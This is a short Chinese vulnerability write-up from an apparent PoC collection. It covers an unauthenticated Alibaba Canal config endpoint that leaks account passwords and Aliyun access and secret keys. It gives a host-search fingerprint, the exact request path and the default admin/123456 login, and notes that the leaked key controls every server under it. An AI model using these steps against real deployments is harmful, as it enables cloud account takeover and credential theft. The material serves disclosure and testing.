Awesome-POC/Web应用漏洞/Alibaba Canal config 云密钥信息泄露漏洞.md
2024-11-06 14:10:36 +08:00

41 lines
610 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Alibaba Canal config 云密钥信息泄露漏洞
## 漏洞描述
由于/api/v1/canal/config 未进行权限验证可直接访问导致账户密码、accessKey、secretKey等一系列敏感信息泄露
## 漏洞影响
```
Alibaba Canal
```
## 网络测绘
```
title="Canal Admin"
```
## 漏洞复现
验证漏洞的Url为
```plain
/api/v1/canal/config/1/0
```
![](images/202202102002400.png)
其中泄露了 aliyun.access 密钥,可以控制密钥下的所有服务器
云密钥泄露参考: red.peiqi.tech
其中还含有默认口令 **admin/123456**
![](images/202202102002074.png)